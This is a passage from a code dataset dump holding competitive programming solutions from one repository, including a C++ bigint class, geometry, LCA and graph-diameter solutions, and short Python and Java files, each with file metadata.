}\n};\n\nstruct B : A\n{\n int get()\n {\n return 2;\n }\n};\n\nstruct C : A\n{\n int get()\n {\n return -A::get() * 2;\n }\n};\n\nstruct D : A {};\n\nint main()\n{\n A a;\n B b;\n C c;\n D d;\n std::cout << a.get() << \" \" << b.get() << \" \" << c.get() << \" \" << d.get() << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.43139931559562683, "alphanum_fraction": 0.4416382312774658, "avg_line_length": 23.35866928100586, "blob_id": "023ad559d7e96c6252409ccdeb6f9dea95455230", "content_id": "784d27191c2840e502a5594d253791d0abd6dfc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10255, "license_type": "no_license", "max_line_length": 101, "num_lines": 421, "path": "/scripts/A+B/bigint.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <writeln.h>\n\nusing namespace std;\n\n#define SZ(container) int(container.size())\n\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\nstatic constexpr int binpow(int x, int d) {\n int ret = 1;\n for (int i = 0; i < d; ++i)\n ret *= x;\n return ret;\n};\nstatic const int BASE = 10;\nstatic const int POW = 9;\ntemplate<typename T = int, size_t B = binpow(BASE, POW)>\nstruct bigint;\n\n// Ostream operator << {{{\ntemplate<typename T, size_t B>\nstd::ostream & operator<<(std::ostream &os, bigint<T, B> b)\n{\n return os << b.toString();\n} // }}}\n\n// Istream operator >> {{{\ntemplate<typename T, size_t B>\nstd::istream & operator>>(std::istream &is, bigint<T, B>& b)\n{\n string s;\n is >> s;\n b = bigint<T, B>(s);\n return is;\n} // }}}\n\ntemplate<typename T, size_t B>\nstruct bigint\n{\nprivate:\n vector<T> a = {0};\n int sign = 1;\n\npublic:\n auto begin() const { return a.crbegin(); }\n auto end() const { return a.crend(); }\n\nprivate:\n // Friend stream operators {{{\n friend std::ostream & operator<< <>(std::ostream &os, bigint<T, B> b);\n friend std::istream & operator>> <>(std::istream &os, bigint<T, B>& b);\n // }}}\n\n template<typename X, typename F>\n static void addVectors(vector<X>& x, const vector<X>& y, F f = bigint::add, int index = 0) // {{{\n {\n for (int i = 0, carry = 0; i < SZ(y) || carry; ++i)\n {\n const auto& [value, currentCarry] = f(getDigit(x, i + index), getDigit(y, i) + carry);\n setDigit(x, i + index, value);\n carry = currentCarry;\n }\n } // }}}\n\n template<typename X>\n static vector<X> mulVectorDigit(const vector<X>& x, X y) // {{{\n {\n vector<X> temp(SZ(x));\n X carry = 0;\n for (int i = 0; i < SZ(x) || carry; ++i)\n {\n const auto& [value, residue] = mul(getDigit(x, i), y);\n const auto& [summ, currentCarry] = add(residue, carry);\n setDigit(temp, i, summ);\n carry = value + currentCarry;\n }\n return move(temp);\n } // }}}\n\n template<typename X>\n static void mulVectors(vector<X>& x, const vector<X>& y) // {{{\n {\n vector<X> temp(SZ(x) + SZ(y) - 1);\n for (int i = 0; i < SZ(y); ++i)\n addVectors(temp, mulVectorDigit<X>(x, y[i]), bigint::add, i);\n x = temp;\n } // }}}\n\n pair<bigint, bigint> divmod(const bigint& x, const bigint& z) // {{{\n {\n bigint zero = bigint(0);\n if (z == zero)\n throw \"Division by zero!\";\n int xs = x.sign;\n int ys = z.sign;\n bigint y = z.abs();\n\n if (x.abs() < y)\n return {zero, x};\n\n bigint div, mod;\n div.a.clear();\n mod.a.clear();\n for (int i = SZ(a) - 1; i >= 0; --i)\n {\n mod.a.insert(mod.a.begin(), a[i]);\n mod.trimZeroes();\n T xxx = binSearch(T(0), T(B), [&](T m) { return bigint(m) * y > mod; }, T(1));\n if (xxx)\n {\n --xxx;\n mod -= bigint(xxx) * y;\n div.a.insert(div.a.begin(), xxx);\n div.trimZeroes();\n }\n }\n div.sign = xs * ys;\n mod.sign = xs;\n return {div, mod};\n } // }}}}\n\n //Secure arithmetics {{{\n static pair<T, T> add(T x, T y)\n {\n if (x >= B - y)\n return {x - (B - y), 1};\n return {x + y, 0};\n }\n\n static pair<T, T> sub(T x, T y)\n {\n if (x < y)\n return {x + (B - y), 1};\n return {x - y, 0};\n }\n\n static pair<T, T> mul(T x, T y)\n {\n long long m = x * 1ll * y;\n return {m / B, m % B};\n }\n // }}}\n\n //Secure get by index {{{\n T get(unsigned i) { return getDigit(a, i); }\n\n template<typename C>\n static T getDigit(C& c, unsigned i)\n {\n return c[i];\n //return i >= c.size() || i < 0 ? T(0) : c[i];\n } // }}}\n\n //Secure set by index {{{\n template<typename C>\n static void setDigit(C& c, unsigned i, T value)\n {\n if (i >= c.size())\n c.push_back(value);\n else\n c[i] = value;\n } // }}}\n\n // Trim leading zeroes {{{\n template<typename C>\n void trimZeroes(C& c)\n {\n while (c.size() > 1 && !c.back())\n c.pop_back();\n if (c.size() == 0)\n c.push_back(T(0));\n }\n\n void trimZeroes()\n {\n trimZeroes(a);\n } // }}}\n\n bigint abs() const // {{{\n {\n bigint res = *this;\n res.sign *= res.sign;\n return res;\n } // }}}\n \n //Shift-unshift {{{\n void shift(int d)\n {\n int sz = min(size(), ::abs(d));\n if (d > 0)\n a.erase(a.begin() + size() - sz, a.end());\n else\n a.erase(a.begin(), a.begin() + sz);\n trimZeroes();\n }\n\n void unshift(int d)\n {\n vector<T> temp(d, 0);\n copy(a.begin(), a.end(), back_inserter(temp));\n a = temp;\n }\n // }}}\n\n //Karatsuba multiply {{{\n void fastMul(const bigint& y)\n {\n int xs = size();\n int ys = y.size();\n int m = max(xs, ys) / 2;\n bigint a0(*this);\n bigint a1(*this);\n bigint b0(y);\n bigint b1(y);\n\n a0.shift(max(0, xs - m));\n a1.shift(-m);\n b0.shift(max(0, ys - m));\n b1.shift(-m);\n\n bigint&& a0b0 = a0 * b0;\n bigint&& a1b1 = a1 * b1;\n bigint&& temp = (a0 + a1) * (b0 + b1) - a0b0 - a1b1;\n\n temp.unshift(m);\n a1b1.unshift(2 * m);\n\n *this = a0b0 + temp + a1b1;\n } // }}}\n\n string toString() // {{{\n {\n stringstream os;\n int l = a.size();\n if (sign == -1 && (l != 1 || a[0]))\n os << '-';\n for (int i = 0; i < a.size(); ++i)\n {\n string temp = to_string(a[l - i - 1]);\n if (i && temp.size() != POW) os << string(POW - temp.size(), '0');\n os << temp;\n }\n return os.str();\n } // }}}\n\npublic:\n // Constuctors {{{\n bigint() {}\n\n bigint(long long x)\n {\n if (x < 0)\n sign = -1,\n x *= -1;\n a.clear();\n while (x)\n a.push_back(x % B),\n x /= B;\n a.push_back(0);\n trimZeroes();\n }\n\n bigint(const string& s)\n {\n a.resize(SZ(s) / POW, 0);\n bool ok = s[0] == '-';\n int exs = (SZ(s) - ok) % POW;\n if (exs)\n a.push_back(stoi(s.substr(ok, exs)));\n for (int i = exs + ok; i < SZ(s); i += POW)\n a.push_back(stoi(s.substr(i, POW).c_str()));\n reverse(a.begin(), a.end());\n if (ok) sign = -1;\n trimZeroes();\n }\n // }}}\n\n void operator=(const bigint& v) { // {{{\n sign = v.sign;\n a = v.a;\n } // }}}\n\n template<typename T1>\n void operator=(const T1& v) {\n *this = bigint(v);\n };\n\n T operator[](int i) { return a[i]; }\n\n int size() const { return SZ(a); }\n\n // ?= operators {{{\n bigint& operator+=(const bigint& x) // {{{\n {\n if (sign == x.sign)\n addVectors(a, x.a, bigint::add),\n trimZeroes();\n else\n *this -= -x;\n return *this;\n } // }}}\n\n bigint& operator-=(const bigint& x) // {{{\n {\n if (sign == x.sign)\n {\n if (abs() < x.abs())\n {\n bigint temp = x;\n temp -= *this;\n *this = -temp;\n return *this;\n }\n addVectors(a, x.a, bigint::sub);\n trimZeroes();\n }\n else\n *this += -x;\n return *this;\n } // }}}\n\n bigint& operator*=(const bigint& x) // {{{\n {\n int resSign = sign * x.sign;\n sign = 1;\n if (x.size() * size() <= 3000)\n mulVectors(a, x.a);\n else\n fastMul(x);\n sign = resSign;\n return *this;\n }\n // }}}\n\n bigint& operator/=(const bigint& x) // {{{\n {\n *this = divmod(*this, x).first;\n return *this;\n }\n // }}}\n\n bigint& operator%=(const bigint& x) // {{{\n {\n *this = divmod(*this, x).second;\n return *this;\n }\n // }}}\n // }}}\n\n // Binary operators {{{\n bigint operator+(const bigint& v) const { return bigint(*this) += v; }\n bigint operator-(const bigint& v) const { return bigint(*this) -= v; }\n bigint operator/(const bigint& v) const { return bigint(*this) /= v; }\n bigint operator%(const bigint& v) const { return bigint(*this) %= v; }\n bigint operator*(const bigint& v) const { return bigint(*this) *= v; }\n bigint operator-() const { bigint res = *this; res.sign = -sign; return res; }\n // }}}\n\n // Compare operators {{{\n bool operator<(const bigint &v) const\n {\n if (sign != v.sign)\n return sign < v.sign;\n if (a.size() != v.a.size())\n return a.size() * sign < v.a.size() * sign;\n for (int i = SZ(a) - 1; i >= 0; i--)\n if (a[i] != v.a[i])\n return a[i] * sign < v.a[i] * sign;\n return false;\n }\n\n bool operator>(const bigint &v) const { return v < *this; }\n bool operator<=(const bigint &v) const { return !(v < *this); }\n bool operator>=(const bigint &v) const { return !(*this < v); }\n bool operator==(const bigint &v) const { return !(*this < v) && !(v < *this); }\n bool operator!=(const bigint &v) const { return *this < v || v < *this; }\n // }}}\n\n // Cast {{{\n template<typename T2, size_t B2>\n operator bigint<T2, B2>() {\n typedef bigint<T2, B2> bigint2;\n bigint2 temp(0);\n bigint2 deg(1);\n bigint2 base(B);\n for (T& x : a)\n temp += deg * bigint2(x),\n deg *= base;\n if (sign == -1)\n temp *= bigint2(-1);\n return temp;\n }\n // }}}\n\n void write() const\n {\n for (auto&& x : *this)\n cout << x << \" \";\n writeln();\n }\n};\n\nint main()\n{\n bigint c, d;\n readln(c, d);\n writeln(c + d);\n writeln(c - d);\n writeln(c * d);\n writeln(c / d, c % d);\n return 0;\n}\n" }, { "alpha_fraction": 0.5390070676803589, "alphanum_fraction": 0.6241135001182556, "avg_line_length": 19.095237731933594, "blob_id": "8adc94811e44528c8bf8667bd8bd84f960c95044", "content_id": "4b81f1c684e4a11c9867028cb4782c573670fa14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 423, "license_type": "no_license", "max_line_length": 38, "num_lines": 21, "path": "/CodeForce/gym/396147/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nif n < 1200:\n print('Newbie')\nelif n < 1400:\n print('Pupil')\nelif n < 1600:\n print('Specialist')\nelif n < 1900:\n print('Expert')\nelif n < 2100:\n print('Candidate Master')\nelif n < 2300:\n print('Master')\nelif n < 2400:\n print('International Master')\nelif n < 2600:\n print('Grandmaster')\nelif n < 3000:\n print('International Grandmaster')\nelse:\n print('Legendary Grandmaster')\n\n" }, { "alpha_fraction": 0.4402279853820801, "alphanum_fraction": 0.4534273147583008, "avg_line_length": 28.63111114501953, "blob_id": "abe9190399c1d864985a0782f2cb57a9f0ee31f0", "content_id": "f12ba6b3e39a1573386ffc7a506b6e1be7eb9202", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6667, "license_type": "no_license", "max_line_length": 210, "num_lines": 225, "path": "/2022/snws1/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#define _USE_MATH_DEFINES\n\nusing namespace std;\nconst double EPS = 1E-9;\nconst double PI = M_PI;\n \nstruct pt {\n\tdouble x, y;\n\tpt() { }\n\tpt (double x, double y) : x(x), y(y) { }\n\tpt operator- (const pt & p) const {\n\t\treturn pt (x-p.x, y-p.y);\n\t}\n};\n \ndouble dist (const pt & a, const pt & b) {\n\treturn sqrt ((a.x-b.x)*(a.x-b.x) + (a.y-b.y)*(a.y-b.y));\n}\n \ndouble get_ang (const pt & a, const pt & b) {\n\tdouble ang = abs (atan2 (a.y, a.x) - atan2 (b.y, b.x));\n\treturn min (ang, 2*PI-ang);\n}\n \nstruct line {\n\tdouble a, b, c;\n\tline (const pt & p, const pt & q) {\n\t\ta = p.y - q.y;\n\t\tb = q.x - p.x;\n\t\tc = - a * p.x - b * p.y;\n\t\tdouble z = sqrt (a*a + b*b);\n\t\ta/=z, b/=z, c/=z;\n\t}\n};\n \ndouble det (double a, double b, double c, double d) {\n\treturn a * d - b * c;\n}\n \npt intersect (const line & n, const line & m) {\n\tdouble zn = det (n.a, n.b, m.a, m.b);\n\treturn pt (\n\t\t- det (n.c, n.b, m.c, m.b) / zn,\n\t\t- det (n.a, n.c, m.a, m.c) / zn\n\t);\n}\n \nbool parallel (const line & n, const line & m) {\n\treturn abs (det (n.a, n.b, m.a, m.b)) < EPS;\n}\n \ndouble get_h (const pt & p1, const pt & p2,\n\tconst pt & l1, const pt & l2, const pt & r1, const pt & r2)\n{\n\tpt q1 = intersect (line (p1, p2), line (l1, l2));\n\tpt q2 = intersect (line (p1, p2), line (r1, r2));\n\tdouble l = dist (q1, q2);\n\tdouble alpha = get_ang (l2 - l1, p2 - p1) / 2;\n\tdouble beta = get_ang (r2 - r1, p1 - p2) / 2;\n\treturn l * sin(alpha) * sin(beta) / sin(alpha+beta);\n}\n \nstruct cmp {\n\tbool operator() (const pair<double,int> & a, const pair<double,int> & b) const {\n\t\tif (abs (a.first - b.first) > EPS)\n\t\t\treturn a.first < b.first;\n\t\treturn a.second < b.second;\n\t}\n};\n \n#define pointtt template<typename T = int>\npointtt struct point\n{\n T x, y;\n point(){}\n point(T _x, T _y) : x(_x), y(_y) {}\n point(const point& other) : x(other.x), y(other.y) {}\n point operator=(const point& b) { x = b.x; y = b.y; return *this; }\n point operator+(const point& b) const { return point(x + b.x, y + b.y); }\n point operator-(const point& b) const { return point(x - b.x, y - b.y); }\n point operator-() const { return point(-x, -y); }\n T operator*(const point& b) const { return x * b.x + y * b.y; }\n T operator^(const point& b) const { return x * b.y - y * b.x; }\n T operator!() const { return x * x + y * y; }\n bool operator<(const point& b) const { return x == b.x ? y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,const point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(const point<T>&a,const point<T>&b){return!point<T>(a-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(const point<T>&a,const point<T>&b,const point<T>&c){return{abs((a-b)*c)+(a^b),dist(a,b)};}\nstatic const int CW = 1;\nstatic const int CCW = -1;\npointtt int orientation(const point<T>&a,const point<T>&b,const point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?CCW:q<0?CW:0;}\n//reflects point C to line AB (in doubles)\npointtt point<T> reflect(const point<T>&a,const point<T>&b,const point<T>&c){\n T A = a.y - b.y;\n T B = b.x - a.x;\n T C = a ^ b;\n T D = A * A - B * B;\n T S = A * A + B * B;\n return {(-D * c.x - 2 * A * B * c.y - 2 * A * C) / S, (D * c.y - 2 * A * B * c.x - 2 * B * C) / S};\n};\n\n//IgorjanconvexHull\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define all(a) a.begin(), a.end()\n#define ll long long\npointtt void convexHull(vector<point<T>>&a){sort(all(a));int n=size(a),j=-1,k=0;ROF(i,n-2,0)a.push_back(a[i]);fori(n){while(j>k&&orientation(a[j-1],a[j],a[i])!=1)--j;a[++j]=a[i];if(!k&&i==n-1)k=j;}a.resize(j);}\n\nint main() {\n int q;\n cin >> q;\n vector<double> ks;\n for (int Q = 0; Q < q; Q++)\n {\n int n;\n cin >> n;\n vector<point<ll>> P;\n fori(n)\n {\n point<ll> ppp;\n cin >> ppp;\n P.push_back(ppp);\n while (P.size() >= 3)\n {\n int sz = P.size();\n if (orientation(P[sz - 3], P[sz - 2], P[sz - 1]) == 0)\n P[sz - 2] = P[sz - 1],\n P.pop_back();\n else\n break;\n }\n\n }\n if (P.size() >= 3)\n {\n int sz = P.size();\n if (orientation(P[sz - 2], P[sz - 1], P[0]) == 0)\n P.pop_back();\n }\n if (P.size() >= 3)\n {\n int sz = P.size();\n if (orientation(P[sz - 1], P[0], P[1]) == 0)\n P.erase(P.begin());\n }\n n = P.size();\n vector<pt> p(n);\n for (int i = 0; i < n; ++i)\n p[i].x = P[i].x,\n p[i].y = P[i].y;\n \n \n vector<int> next (n), prev (n);\n for (int i=0; i<n; ++i) {\n next[i] = (i + 1) % n;\n prev[i] = (i - 1 + n) % n;\n }\n \n set < pair<double,int>, cmp > q;\n vector<double> h (n);\n for (int i=0; i<n; ++i) {\n h[i] = get_h (\n p[i], p[next[i]],\n p[i], p[prev[i]],\n p[next[i]], p[next[next[i]]]\n );\n q.insert (make_pair (h[i], i));\n }\n \n double last_time;\n while (q.size() > 2) {\n last_time = q.begin()->first;\n int i = q.begin()->second;\n q.erase (q.begin());\n \n next[prev[i]] = next[i];\n prev[next[i]] = prev[i];\n int nxt = next[i], nxt1 = (nxt+1)%n,\n prv = prev[i], prv1 = (prv+1)%n;\n if (parallel (line (p[nxt], p[nxt1]), line (p[prv], p[prv1])))\n break;\n \n q.erase (make_pair (h[nxt], nxt));\n q.erase (make_pair (h[prv], prv));\n \n h[nxt] = get_h (\n p[nxt], p[nxt1],\n p[prv1], p[prv],\n p[next[nxt]], p[(next[nxt]+1)%n]\n );\n h[prv] = get_h (\n p[prv], p[prv1],\n p[(prev[prv]+1)%n], p[prev[prv]],\n p[nxt], p[nxt1]\n );\n \n q.insert (make_pair (h[nxt], nxt));\n q.insert (make_pair (h[prv], prv));\n }\n \n ks.push_back(last_time);\n }\n int k;\n cin >> k;\n vector<int> a(k);\n fori(k)\n cin >> a[i];\n sort(all(ks));\n sort(all(a));\n int cnt = 0;\n int i = 0;\n for (auto x: a)\n {\n while (i < q && x > ks[i])\n ++i;\n if (i < q)\n ++i,\n ++cnt;\n }\n cout << cnt << endl;\n}\n" }, { "alpha_fraction": 0.43654823303222656, "alphanum_fraction": 0.46515920758247375, "avg_line_length": 24.439023971557617, "blob_id": "a4b10a88579a620e552802606dc387da31db61d1", "content_id": "56a4d53d7c3158b6f36d7289b875ccb2730e39e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2503, "license_type": "no_license", "max_line_length": 72, "num_lines": 82, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma comment(linker, \"/STACK:16000000\")\r\n#include <vector>\r\n#include <algorithm>\r\n#include <iostream>\r\n#include <fstream>\r\n#include <cstdio>\r\n#include <stdio.h>\r\n#define INF 1000000000\r\nusing namespace std;\r\n \r\nvector<bool> used_glob;\r\nvector<vector<int>> edges;\r\nvector<int> diams;\r\n \r\nint dfs1(int v, int d, vector<bool>& used) {\r\n    if (used[v])\r\n        return 0;\r\n    int max_deep = d;\r\n    used[v] = 1;\r\n    for (int i = 0; i < edges[v].size(); i++) {\r\n        max_deep = max(max_deep, dfs1(edges[v][i], d + 1, used));\r\n    }\r\n    return max_deep;\r\n}\r\n \r\nvoid dfs2(int v, int depth, int cur_d, int &new_v, vector<bool>& used) {\r\n    if (used[v])\r\n        return;\r\n    used[v] = 1;\r\n    if (depth == cur_d) {\r\n        new_v = v;\r\n        return;\r\n    }\r\n    for (int i = 0; i < edges[v].size(); i++) {\r\n        dfs2(edges[v][i], depth, cur_d + 1, new_v, used);\r\n    }\r\n}\r\n \r\nvoid find_d(int v) {\r\n    vector<bool> used = vector<bool>(edges.size(), false);\r\n    int deep1 = dfs1(v, 0, used);\r\n    used = vector<bool>(used.size(), false);\r\n    int new_v;\r\n    dfs2(v, deep1, 0, new_v, used);\r\n    int ans = dfs1(new_v, 0, used_glob);\r\n    diams.push_back(ans);\r\n}\r\nvoid main(){\r\n    //ifstream in(\"in.txt\"); \r\n    //ofstream out(\"out.txt\");\r\n    int n, l;\r\n    cin >> n >> l;\r\n    edges = vector<vector<int>>(n);\r\n    for (int i = 0; i < l; i++) {\r\n        int a, b;\r\n        cin >> a >> b;\r\n        edges[a].push_back(b);\r\n        edges[b].push_back(a);\r\n    }\r\n    used_glob = vector<bool>(n, false);\r\n    for (int i = 0; i < n; i++) {\r\n        if (!used_glob[i])\r\n            find_d(i);\r\n    }\r\n    if (diams.size() == 1) {\r\n        cout << diams[0];\r\n        return;\r\n    } \r\n    if (diams.size() == 2) {\r\n        int a = diams[0];\r\n        int b = diams[1];\r\n        cout << max(a, a / 2 + a % 2 + b / 2 + b % 2 + 1);\r\n    } else {\r\n        sort(diams.begin(), diams.end());\r\n        int a = diams[diams.size() - 1];\r\n        int b = diams[diams.size() - 2];\r\n        int c = diams[diams.size() - 3];\r\n        int ans = max(a, a / 2 + a % 2 + b / 2 + b % 2 + 1);\r\n        ans = max(ans, b / 2 + b % 2 + c / 2 + c % 2 + 2);\r\n        cout << ans;\r\n    }\r\n}\n" }, { "alpha_fraction": 0.37799718976020813, "alphanum_fraction": 0.401974618434906, "avg_line_length": 26.269229888916016, "blob_id": "f4c5982ed4965b9baa0345e5e80619542e8793be", "content_id": "d2e4f1cbdcbb266d32fb2b0420e8880911f46049", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 709, "license_type": "no_license", "max_line_length": 48, "num_lines": 26, "path": "/2019/GCJ/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport sys\n\ndef main():\n n, l = map(int, input().split())\n a = list(map(int, input().split()))\n b = [0] * (l + 1)\n for i in range(l - 1):\n if a[i] != a[i + 1]:\n pi = math.gcd(a[i], a[i + 1])\n b[i + 1] = pi\n for j in range(i, -1, -1):\n b[j] = a[j] // b[j + 1]\n for j in range(i + 2, l + 1):\n b[j] = a[j - 1] // b[j - 1]\n c = list(sorted(list(set(b))))\n d = {}\n if len(c) != 26:\n sys.exit(1)\n for i in range(len(c)):\n d[c[i]] = chr(ord('A') + i)\n print(''.join(map(lambda x: d[x], b)))\n\nfor t in range(int(input())):\n sys.stdout.write(\"Case #{}: \".format(t + 1))\n main()\n" }, { "alpha_fraction": 0.41025641560554504, "alphanum_fraction": 0.4455128312110901, "avg_line_length": 25, "blob_id": "88a297da94cb86070edbf41f25f7f7d2d7fec530", "content_id": "68cd1dd385c0ee7b7c69b5b4b5d16334e023f16d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 44, "num_lines": 12, "path": "/scripts/A+B/A+B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "a, b = map(int, input().split())\nprint(a + b)\nprint(a - b)\nprint(a * b)\nif a >= 0 and b >= 0:\n print(a // b, a % b)\nelif a >= 0 and b <= 0:\n print(-(a // abs(b)), a % abs(b))\nelif a <= 0 and b >= 2:\n print(a // b + 1, -(abs(a) % b))\nelif a <= 0 and b <= 1: # -1 1 case is here!\n print(a // b, a % b)\n" }, { "alpha_fraction": 0.6504064798355103, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 19.5, "blob_id": "0df5cdf7105bc86926b4b7ee114aa3e89f897aba", "content_id": "08fe5739c36e62ca6406aa49b776ee111637c684", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 369, "license_type": "no_license", "max_line_length": 67, "num_lines": 18, "path": "/study/task7/Test.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\n\nimport java.io.IOException;\nimport java.util.List;\nimport java.util.Random;\n\npublic class Test {\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tRandom rnd = new Random();\n\t\tList<Digit> d = IOUtils.readDigitSet(\"ann/train\");\n\t\tfor (int i = 0; i < 10; i++) {\n\t\t\t(new SimViz(10, d.get(rnd.nextInt(d.size())))).setVisible(true);\n\t\t}\n\n\t}\n\n}\n" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.6601307392120361, "avg_line_length": 20.571428298950195, "blob_id": "3203bba6703ec1345a3ae5c623ee9586f4c7692f", "content_id": "94eacaefca461112a1b0b0b94071979ca2506905", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 38, "num_lines": 7, "path": "/CodeForce/gym/101090/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "from decimal import *\n\nn, k = list(map(int, input().split()))\ngetcontext().prec = k + 10\ngetcontext().rounding = ROUND_FLOOR\n\nprint(Decimal(n).sqrt())\n\n\n" }, { "alpha_fraction": 0.41129180788993835, "alphanum_fraction": 0.4266398549079895, "avg_line_length": 27.957672119140625, "blob_id": "647400d91401c91d644dabb2d5e76ea9e7744602", "content_id": "276f8720073d0815b440fc1d729708cdd0add059", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5473, "license_type": "no_license", "max_line_length": 174, "num_lines": 189, "path": "/CodeForce/1702/G2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//lca\nstruct lca\n{\n vector<vector<int>> g, up;\n vector<int> h;\n int n, l;\n\n lca(const vector<vector<int>>& g) //O(n * log(n))\n {\n this->g = g;\n n = SZ(g);\n l = 1;\n while ((1 << l) <= n) ++l;\n h.resize(n, -1);\n up.resize(l + 1, vector<int>(n));\n dfs(0, 0);\n fori(l)\n forj(n)\n up[i + 1][j] = up[i][up[i][j]];\n }\n \n int getParent(int u, int dist) { //O(log(n))\n fori(l)\n if (dist >> i & 1)\n u = up[i][u];\n return u;\n }\n\n void dfs(int u, int p) //O(n)\n {\n h[u] = h[p] + 1;\n up[0][u] = p;\n for (const int& v: g[u])\n if (v != p)\n dfs(v, u);\n }\n\n int get(int a, int b) //O(log(n))\n {\n if (h[a] < h[b]) swap(a, b);\n a = getParent(a, h[a] - h[b]);\n if (a == b) return a;\n ROF(i, l, 0)\n if (up[i][a] != up[i][b])\n a = up[i][a],\n b = up[i][b];\n return up[0][a];\n }\n\n int getChildWithVertex(int a, int b) //O(log(n))\n {\n if (a == b) return -1;\n return getParent(b, h[b] - h[a] - 1);\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vector<vector<int>> g(n);\n fori(n - 1)\n {\n ints(u, v); --u; --v;\n g[u].pb(v);\n g[v].pb(u);\n }\n lca l(g);\n ints(q);\n forn(Q, q)\n {\n ints(k);\n map<int, vector<int>> m;\n fori(k)\n {\n ints(x); --x;\n m[-l.h[x]].pb(x);\n }\n if (k == 1)\n {\n writeln(\"YES\");\n continue;\n }\n auto find = [&](const int& first, const int& second) {\n int cur = l.get(first, second);\n if (cur == first || cur == second)\n return -1;\n return cur;\n };\n bool ok = true;\n bool last = false;\n int first = -1;\n int second = -1;\n for (auto& [h, vs]: m)\n if (vs.size() > 2)\n ok = false;\n else\n {\n for (int u: vs)\n {\n if (last)\n ok = false;\n if (first == -1)\n first = u;\n else\n {\n if (find(u, first) == -1)\n {\n if (second != -1 && find(u, second) == -1)\n {\n int fin = find(first, second);\n if (fin != u)\n ok = false;\n else\n last = true;\n }\n first = u;\n }\n else if (second == -1)\n second = u;\n else if (find(u, second) == -1)\n second = u;\n else\n ok = false;\n }\n }\n }\n\n writeln(ok ? \"YES\" : \"NO\");\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return 